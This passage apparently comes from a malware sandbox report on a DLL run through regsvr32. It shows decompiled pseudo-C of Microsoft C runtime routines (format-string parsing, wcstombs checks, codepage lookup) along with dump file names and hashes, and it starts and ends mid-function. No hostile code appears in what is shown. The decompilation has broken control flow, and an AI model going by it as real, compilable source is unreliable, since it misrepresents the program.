                                                                                				_t101 = E00007FFA7FFA5246CF80(_v16);
                                                                                				r9d = _v88;
                                                                                				return E00007FFA7FFA52473BD0(_t101, _a8, _a16, _a24);
                                                                                			}



























                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: State$_inconsistency$BaseControlCurrentFromImage
                                                                                • String ID:
                                                                                • API String ID: 2452617236-0
                                                                                • Opcode ID: 03736bbfa20cfa1d6e80738f38b28c8345d2a0856ef117f7f635166efef2818c
                                                                                • Instruction ID: 9342b333d24315bc0d3f5b63d50111b35f7467fa65d74eb61311a179df709a19
                                                                                • Opcode Fuzzy Hash: 03736bbfa20cfa1d6e80738f38b28c8345d2a0856ef117f7f635166efef2818c
                                                                                • Instruction Fuzzy Hash: 5661FC32A0DA8186DA70DB54E45036AB3B0FBC5B49F188535EA9D87B9ADF7CE4418B40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 27%
                                                                                			E00007FFA7FFA52469F20(intOrPtr __ecx, intOrPtr* __rax, intOrPtr _a8) {
                                                                                				long long _v16;
                                                                                				intOrPtr _v20;
                                                                                				intOrPtr _v24;
                                                                                				int _v28;
                                                                                				int _v32;
                                                                                				char _v64;
                                                                                				long long _v72;
                                                                                				intOrPtr _t29;
                                                                                				intOrPtr* _t41;
                                                                                
                                                                                				_t41 = __rax;
                                                                                				_a8 = __ecx;
                                                                                				_v16 = 0xfffffffe;
                                                                                				_v72 = 0;
                                                                                				0x524666b0();
                                                                                				 *0x5248cd68 = 0;
                                                                                				if (_a8 != 0xfffffffe) goto 0x52469f81;
                                                                                				 *0x5248cd68 = 1;
                                                                                				_v32 = GetOEMCP();
                                                                                				E00007FFA7FFA52466800( &_v64);
                                                                                				goto 0x52469fe3;
                                                                                				if (_a8 != 0xfffffffd) goto 0x52469fae;
                                                                                				 *0x5248cd68 = 1;
                                                                                				_v28 = GetACP();
                                                                                				E00007FFA7FFA52466800( &_v64);
                                                                                				_t29 = _v28;
                                                                                				goto 0x52469fe3;
                                                                                				if (_a8 != 0xfffffffc) goto 0x52469fe3;
                                                                                				 *0x5248cd68 = 1;
                                                                                				E00007FFA7FFA52466840(_t29,  &_v64);
                                                                                				_v24 =  *((intOrPtr*)( *_t41 + 4));
                                                                                				E00007FFA7FFA52466800( &_v64);
                                                                                				goto 0x52469ff9;
                                                                                				_v20 = _a8;
                                                                                				E00007FFA7FFA52466800( &_v64);
                                                                                				return _v20;
                                                                                			}













                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_
                                                                                • String ID:
                                                                                • API String ID: 1901436342-0
                                                                                • Opcode ID: 69024ba52bd34e7b32b0e788ec4f64afe9409c237456bc3d803b93947163d83b
                                                                                • Instruction ID: 0bf3028c2791ec8c58b77183db2055c904c36c40b8bd4f1941e18b00017198e7
                                                                                • Opcode Fuzzy Hash: 69024ba52bd34e7b32b0e788ec4f64afe9409c237456bc3d803b93947163d83b
                                                                                • Instruction Fuzzy Hash: F721FF3290C5419AE7249F24E88016ABBF0EB85764F148335E2AD466E9DFBCE545CF80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: P$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c$sizeInBytes > retsize
                                                                                • API String ID: 2123368286-552404435
                                                                                • Opcode ID: f12e70934a7f8eca6376172156a370be3a7c923ed3c4affde7108b6e7297d87f
                                                                                • Instruction ID: 444f3bd627df41f77c8a6645bd4a7649f5abd14a896ee6dd16e93d2959bb637d
                                                                                • Opcode Fuzzy Hash: f12e70934a7f8eca6376172156a370be3a7c923ed3c4affde7108b6e7297d87f
                                                                                • Instruction Fuzzy Hash: 8751F63190CBC585E6708B14E84436A63F0FB96764F188635D6BD47BE8DFBCE4469B01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 28%
                                                                                			E00007FFA7FFA5247DC6B(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                                                				void* _t184;
                                                                                				char* _t204;
                                                                                				char* _t205;
                                                                                
                                                                                				_a112 = 0;
                                                                                				_a108 = _a112;
                                                                                				_a88 = _a108;
                                                                                				_a92 = _a88;
                                                                                				_a80 = 0;
                                                                                				_a116 = 0xffffffff;
                                                                                				_a76 = 0;
                                                                                				_a1404 = _a1208 & 0x0000ffff;
                                                                                				if (_a1404 == 0x20) goto 0x5247dd05;
                                                                                				if (_a1404 == 0x23) goto 0x5247dd12;
                                                                                				if (_a1404 == 0x2b) goto 0x5247dcf8;
                                                                                				if (_a1404 == 0x2d) goto 0x5247dceb;
                                                                                				if (_a1404 == 0x30) goto 0x5247dd20;
                                                                                				goto 0x5247dd2b;
                                                                                				_a80 = _a80 | 0x00000004;
                                                                                				goto 0x5247dd2b;
                                                                                				_a80 = _a80 | 0x00000001;
                                                                                				goto 0x5247dd2b;
                                                                                				_a80 = _a80 | 0x00000002;
                                                                                				goto 0x5247dd2b;
                                                                                				asm("bts eax, 0x7");
                                                                                				goto 0x5247dd2b;
                                                                                				_a80 = _a80 | 0x00000008;
                                                                                				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x5247dd6c;
                                                                                				_t204 =  &_a1560;
                                                                                				_a88 = E00007FFA7FFA52471E40(_t204);
                                                                                				if (_a88 >= 0) goto 0x5247dd6a;
                                                                                				_a80 = _a80 | 0x00000004;
                                                                                				_a88 =  ~_a88;
                                                                                				goto 0x5247dd83;
                                                                                				_a88 = _t184 + _t204 - 0x30;
                                                                                				_a116 = 0;
                                                                                				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x5247ddc4;
                                                                                				_t205 =  &_a1560;
                                                                                				_a116 = E00007FFA7FFA52471E40(_t205);
                                                                                				if (_a116 >= 0) goto 0x5247ddc2;
                                                                                				_a116 = 0xffffffff;
                                                                                				goto 0x5247dddb;
                                                                                				_a116 = _t184 + _t205 - 0x30;
                                                                                				_a1408 = _a1208 & 0x0000ffff;
                                                                                				if (_a1408 == 0x49) goto 0x5247de66;
                                                                                				if (_a1408 == 0x68) goto 0x5247df6f;
                                                                                				if (_a1408 == 0x6c) goto 0x5247de24;
                                                                                				if (_a1408 == 0x77) goto 0x5247df7c;
                                                                                				goto 0x5247df88;
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0x5247de56;
                                                                                				_a1544 =  &(_a1544[1]);
                                                                                				asm("bts eax, 0xc");
                                                                                				goto 0x5247de61;
                                                                                				_a80 = _a80 | 0x00000010;
                                                                                				goto 0x5247df88;
                                                                                				asm("bts eax, 0xf");
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0x5247deb8;
                                                                                				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0x5247deb8;
                                                                                				_a1544 =  &(_a1544[2]);
                                                                                				asm("bts eax, 0xf");
                                                                                				goto 0x5247df6d;
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0x5247defb;
                                                                                				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0x5247defb;
                                                                                				_a1544 =  &(_a1544[2]);
                                                                                				asm("btr eax, 0xf");
                                                                                				goto 0x5247df6d;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0x5247df5d;
                                                                                				goto 0x5247df6d;
                                                                                				_a1216 = 0;
                                                                                				goto E00007FFA7FFA5247DC41;
                                                                                				goto 0x5247df88;
                                                                                				_a80 = _a80 | 0x00000020;
                                                                                				goto 0x5247df88;
                                                                                				asm("bts eax, 0xb");
                                                                                				_a1412 = _a1208 & 0x0000ffff;
                                                                                				_a1412 = _a1412 - 0x41;
                                                                                				if (_a1412 - 0x37 > 0) goto 0x5247ea2a;
                                                                                				goto __rax;
                                                                                			}







                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2192614184-734865713
                                                                                • Opcode ID: d839b4f8492d9702b4695783724771f139c243a43186ab9091008b35e86c7283
                                                                                • Instruction ID: aa6985e6bb7ea6890fab7692b83db90917be213b6db5baa3c8709ab291cef098
                                                                                • Opcode Fuzzy Hash: d839b4f8492d9702b4695783724771f139c243a43186ab9091008b35e86c7283
                                                                                • Instruction Fuzzy Hash: AF410DB291C6C1CAE7708B24E8403AAB7F0F785345F488135E6AD87A99DBBCD441CF14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 28%
                                                                                			E00007FFA7FFA5247BCBD(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a968, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                                                				void* _t184;
                                                                                				char* _t204;
                                                                                				char* _t205;
                                                                                
                                                                                				_a112 = 0;
                                                                                				_a108 = _a112;
                                                                                				_a88 = _a108;
                                                                                				_a92 = _a88;
                                                                                				_a80 = 0;
                                                                                				_a116 = 0xffffffff;
                                                                                				_a76 = 0;
                                                                                				_a968 = _a696 & 0x000000ff;
                                                                                				if (_a968 == 0x20) goto 0x5247bd57;
                                                                                				if (_a968 == 0x23) goto 0x5247bd64;
                                                                                				if (_a968 == 0x2b) goto 0x5247bd4a;
                                                                                				if (_a968 == 0x2d) goto 0x5247bd3d;
                                                                                				if (_a968 == 0x30) goto 0x5247bd72;
                                                                                				goto 0x5247bd7d;
                                                                                				_a80 = _a80 | 0x00000004;
                                                                                				goto 0x5247bd7d;
                                                                                				_a80 = _a80 | 0x00000001;
                                                                                				goto 0x5247bd7d;
                                                                                				_a80 = _a80 | 0x00000002;
                                                                                				goto 0x5247bd7d;
                                                                                				asm("bts eax, 0x7");
                                                                                				goto 0x5247bd7d;
                                                                                				_a80 = _a80 | 0x00000008;
                                                                                				if (_a696 != 0x2a) goto 0x5247bdbe;
                                                                                				_t204 =  &_a1112;
                                                                                				_a88 = E00007FFA7FFA52471E40(_t204);
                                                                                				if (_a88 >= 0) goto 0x5247bdbc;
                                                                                				_a80 = _a80 | 0x00000004;
                                                                                				_a88 =  ~_a88;
                                                                                				goto 0x5247bdd5;
                                                                                				_a88 = _t184 + _t204 - 0x30;
                                                                                				_a116 = 0;
                                                                                				if (_a696 != 0x2a) goto 0x5247be16;
                                                                                				_t205 =  &_a1112;
                                                                                				_a116 = E00007FFA7FFA52471E40(_t205);
                                                                                				if (_a116 >= 0) goto 0x5247be14;
                                                                                				_a116 = 0xffffffff;
                                                                                				goto 0x5247be2d;
                                                                                				_a116 = _t184 + _t205 - 0x30;
                                                                                				_a972 = _a696 & 0x000000ff;
                                                                                				if (_a972 == 0x49) goto 0x5247beb7;
                                                                                				if (_a972 == 0x68) goto 0x5247bfc0;
                                                                                				if (_a972 == 0x6c) goto 0x5247be76;
                                                                                				if (_a972 == 0x77) goto 0x5247bfcd;
                                                                                				goto 0x5247bfd9;
                                                                                				if ( *_a1096 != 0x6c) goto 0x5247bea7;
                                                                                				_a1096 = _a1096 + 1;
                                                                                				asm("bts eax, 0xc");
                                                                                				goto 0x5247beb2;
                                                                                				_a80 = _a80 | 0x00000010;
                                                                                				goto 0x5247bfd9;
                                                                                				asm("bts eax, 0xf");
                                                                                				if ( *_a1096 != 0x36) goto 0x5247bf09;
                                                                                				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0x5247bf09;
                                                                                				_a1096 = _a1096 + 2;
                                                                                				asm("bts eax, 0xf");
                                                                                				goto 0x5247bfbe;
                                                                                				if ( *_a1096 != 0x33) goto 0x5247bf4c;
                                                                                				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0x5247bf4c;
                                                                                				_a1096 = _a1096 + 2;
                                                                                				asm("btr eax, 0xf");
                                                                                				goto 0x5247bfbe;
                                                                                				if ( *_a1096 == 0x64) goto 0x5247bfac;
                                                                                				if ( *_a1096 == 0x69) goto 0x5247bfac;
                                                                                				if ( *_a1096 == 0x6f) goto 0x5247bfac;
                                                                                				if ( *_a1096 == 0x75) goto 0x5247bfac;
                                                                                				if ( *_a1096 == 0x78) goto 0x5247bfac;
                                                                                				if ( *_a1096 != 0x58) goto 0x5247bfae;
                                                                                				goto 0x5247bfbe;
                                                                                				_a704 = 0;
                                                                                				goto E00007FFA7FFA5247BB66;
                                                                                				goto 0x5247bfd9;
                                                                                				_a80 = _a80 | 0x00000020;
                                                                                				goto 0x5247bfd9;
                                                                                				asm("bts eax, 0xb");
                                                                                				_a976 = _a696;
                                                                                				_a976 = _a976 - 0x41;
                                                                                				if (_a976 - 0x37 > 0) goto 0x5247ca31;
                                                                                				goto __rax;
                                                                                			}







                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2192614184-192189897
                                                                                • Opcode ID: 838c9af7f6c21a6938ef5e99847a712facd56587850898e9071408f632ec2777
                                                                                • Instruction ID: 04ebf31ffc9ba23a685a9ff9eead22ddd493a6f644ec57c09243ffcd36a6b1d4
                                                                                • Opcode Fuzzy Hash: 838c9af7f6c21a6938ef5e99847a712facd56587850898e9071408f632ec2777
                                                                                • Instruction Fuzzy Hash: B1411B7291C6C68AE370DB24E8543AEB7F4E786314F484135D6AC86A9DDBBCE541CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 28%
                                                                                			E00007FFA7FFA5247DC41(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, char _a1200, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, intOrPtr _a1536, signed short* _a1544, char _a1560) {
                                                                                				void* _t190;
                                                                                				char* _t210;
                                                                                				char* _t211;
                                                                                
                                                                                				_a76 = 1;
                                                                                				E00007FFA7FFA5247EE40(_a1208 & 0x0000ffff, _a1536,  &_a1200);
                                                                                				_a112 = 0;
                                                                                				_a108 = _a112;
                                                                                				_a88 = _a108;
                                                                                				_a92 = _a88;
                                                                                				_a80 = 0;
                                                                                				_a116 = 0xffffffff;
                                                                                				_a76 = 0;
                                                                                				_a1404 = _a1208 & 0x0000ffff;
                                                                                				if (_a1404 == 0x20) goto 0x5247dd05;
                                                                                				if (_a1404 == 0x23) goto 0x5247dd12;
                                                                                				if (_a1404 == 0x2b) goto 0x5247dcf8;
                                                                                				if (_a1404 == 0x2d) goto 0x5247dceb;
                                                                                				if (_a1404 == 0x30) goto 0x5247dd20;
                                                                                				goto 0x5247dd2b;
                                                                                				_a80 = _a80 | 0x00000004;
                                                                                				goto 0x5247dd2b;
                                                                                				_a80 = _a80 | 0x00000001;
                                                                                				goto 0x5247dd2b;
                                                                                				_a80 = _a80 | 0x00000002;
                                                                                				goto 0x5247dd2b;
                                                                                				asm("bts eax, 0x7");
                                                                                				goto 0x5247dd2b;
                                                                                				_a80 = _a80 | 0x00000008;
                                                                                				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x5247dd6c;
                                                                                				_t210 =  &_a1560;
                                                                                				_a88 = E00007FFA7FFA52471E40(_t210);
                                                                                				if (_a88 >= 0) goto 0x5247dd6a;
                                                                                				_a80 = _a80 | 0x00000004;
                                                                                				_a88 =  ~_a88;
                                                                                				goto 0x5247dd83;
                                                                                				_a88 = _t190 + _t210 - 0x30;
                                                                                				_a116 = 0;
                                                                                				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x5247ddc4;
                                                                                				_t211 =  &_a1560;
                                                                                				_a116 = E00007FFA7FFA52471E40(_t211);
                                                                                				if (_a116 >= 0) goto 0x5247ddc2;
                                                                                				_a116 = 0xffffffff;
                                                                                				goto 0x5247dddb;
                                                                                				_a116 = _t190 + _t211 - 0x30;
                                                                                				_a1408 = _a1208 & 0x0000ffff;
                                                                                				if (_a1408 == 0x49) goto 0x5247de66;
                                                                                				if (_a1408 == 0x68) goto 0x5247df6f;
                                                                                				if (_a1408 == 0x6c) goto 0x5247de24;
                                                                                				if (_a1408 == 0x77) goto 0x5247df7c;
                                                                                				goto 0x5247df88;
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0x5247de56;
                                                                                				_a1544 =  &(_a1544[1]);
                                                                                				asm("bts eax, 0xc");
                                                                                				goto 0x5247de61;
                                                                                				_a80 = _a80 | 0x00000010;
                                                                                				goto 0x5247df88;
                                                                                				asm("bts eax, 0xf");
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0x5247deb8;
                                                                                				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0x5247deb8;
                                                                                				_a1544 =  &(_a1544[2]);
                                                                                				asm("bts eax, 0xf");
                                                                                				goto 0x5247df6d;
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0x5247defb;
                                                                                				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0x5247defb;
                                                                                				_a1544 =  &(_a1544[2]);
                                                                                				asm("btr eax, 0xf");
                                                                                				goto 0x5247df6d;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0x5247df5d;
                                                                                				goto 0x5247df6d;
                                                                                				_a1216 = 0;
                                                                                				goto E00007FFA7FFA5247DC41;
                                                                                				goto 0x5247df88;
                                                                                				_a80 = _a80 | 0x00000020;
                                                                                				goto 0x5247df88;
                                                                                				asm("bts eax, 0xb");
                                                                                				_a1412 = _a1208 & 0x0000ffff;
                                                                                				_a1412 = _a1412 - 0x41;
                                                                                				if (_a1412 - 0x37 > 0) goto 0x5247ea2a;
                                                                                				goto __rax;
                                                                                			}







                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2192614184-734865713
                                                                                • Opcode ID: 00c8469e1271fc8907031e5201d4ef955f45b92ddfc689a069c686c98e5ea265
                                                                                • Instruction ID: 70c51d4ae3b7b79733eb60a38398124edf76bc0d4944c22b15138d06a577e178
                                                                                • Opcode Fuzzy Hash: 00c8469e1271fc8907031e5201d4ef955f45b92ddfc689a069c686c98e5ea265
                                                                                • Instruction Fuzzy Hash: AC412BA291C6C2C9E7708B14E8403BA76F0FB86345F488135D6AD87999DFBCE441DF14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 24%
                                                                                			E00007FFA7FFA5247DD88(signed int _a80, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                                                				void* _t114;
                                                                                				char* _t134;
                                                                                
                                                                                				_a116 = 0;
                                                                                				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x5247ddc4;
                                                                                				_t134 =  &_a1560;
                                                                                				_a116 = E00007FFA7FFA52471E40(_t134);
                                                                                				if (_a116 >= 0) goto 0x5247ddc2;
                                                                                				_a116 = 0xffffffff;
                                                                                				goto 0x5247dddb;
                                                                                				_a116 = _t114 + _t134 - 0x30;
                                                                                				_a1408 = _a1208 & 0x0000ffff;
                                                                                				if (_a1408 == 0x49) goto 0x5247de66;
                                                                                				if (_a1408 == 0x68) goto 0x5247df6f;
                                                                                				if (_a1408 == 0x6c) goto 0x5247de24;
                                                                                				if (_a1408 == 0x77) goto 0x5247df7c;
                                                                                				goto 0x5247df88;
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0x5247de56;
                                                                                				_a1544 =  &(_a1544[1]);
                                                                                				asm("bts eax, 0xc");
                                                                                				goto 0x5247de61;
                                                                                				_a80 = _a80 | 0x00000010;
                                                                                				goto 0x5247df88;
                                                                                				asm("bts eax, 0xf");
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0x5247deb8;
                                                                                				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0x5247deb8;
                                                                                				_a1544 =  &(_a1544[2]);
                                                                                				asm("bts eax, 0xf");
                                                                                				goto 0x5247df6d;
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0x5247defb;
                                                                                				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0x5247defb;
                                                                                				_a1544 =  &(_a1544[2]);
                                                                                				asm("btr eax, 0xf");
                                                                                				goto 0x5247df6d;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0x5247df5d;
                                                                                				goto 0x5247df6d;
                                                                                				_a1216 = 0;
                                                                                				goto E00007FFA7FFA5247DC41;
                                                                                				goto 0x5247df88;
                                                                                				_a80 = _a80 | 0x00000020;
                                                                                				goto 0x5247df88;
                                                                                				asm("bts eax, 0xb");
                                                                                				_a1412 = _a1208 & 0x0000ffff;
                                                                                				_a1412 = _a1412 - 0x41;
                                                                                				if (_a1412 - 0x37 > 0) goto 0x5247ea2a;
                                                                                				goto __rax;
                                                                                			}






                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2192614184-734865713
                                                                                • Opcode ID: c688226ec199b2b9f0c59a43de4c80c1eb2ed98f75eb3809899ea6a1a3543fc2
                                                                                • Instruction ID: 71856de9854016aa4d5bbb441c2321e0fdd684fed4783efde0f6592eab2c8fa5
                                                                                • Opcode Fuzzy Hash: c688226ec199b2b9f0c59a43de4c80c1eb2ed98f75eb3809899ea6a1a3543fc2
                                                                                • Instruction Fuzzy Hash: B3413AA291C6C2C9E7708B24E8403BA76F0FB86345F488135D6AD87599DFBCE441CF14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 24%
                                                                                			E00007FFA7FFA5247BDDA(signed int _a80, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                                                				void* _t114;
                                                                                				char* _t134;
                                                                                
                                                                                				_a116 = 0;
                                                                                				if (_a696 != 0x2a) goto 0x5247be16;
                                                                                				_t134 =  &_a1112;
                                                                                				_a116 = E00007FFA7FFA52471E40(_t134);
                                                                                				if (_a116 >= 0) goto 0x5247be14;
                                                                                				_a116 = 0xffffffff;
                                                                                				goto 0x5247be2d;
                                                                                				_a116 = _t114 + _t134 - 0x30;
                                                                                				_a972 = _a696 & 0x000000ff;
                                                                                				if (_a972 == 0x49) goto 0x5247beb7;
                                                                                				if (_a972 == 0x68) goto 0x5247bfc0;
                                                                                				if (_a972 == 0x6c) goto 0x5247be76;
                                                                                				if (_a972 == 0x77) goto 0x5247bfcd;
                                                                                				goto 0x5247bfd9;
                                                                                				if ( *_a1096 != 0x6c) goto 0x5247bea7;
                                                                                				_a1096 = _a1096 + 1;
